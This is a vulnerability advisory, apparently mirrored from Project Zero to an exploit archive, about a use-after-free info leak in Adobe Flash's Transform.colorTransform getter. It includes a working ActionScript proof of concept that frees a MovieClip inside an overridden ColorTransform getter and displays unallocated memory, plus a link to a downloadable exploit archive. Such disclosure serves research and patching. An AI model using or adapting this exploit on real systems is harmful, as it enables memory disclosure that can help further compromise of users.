Adobe Flash - Transform.colorTranform Getter Info Leak

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845
 
There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform.
 
A minimal PoC is as follows:
 
this.createEmptyMovieClip( "mc", 1);
var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4);
var t:Transform = new Transform( mc );
t.colorTransform = c;
this.createTextField( "tf", 2, 0, 0, 2000, 200);
var ct = ColorTransform;
var g = flash.geom;
g.addProperty("ColorTransform", func, func);
var q = t.colorTransform;
tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color;
 
function func(){
     
    mc.removeMovieClip();
     
    return ct;
     
    }
 
 
A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen.
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40355.zip

#  0day.today [2018-01-01]  #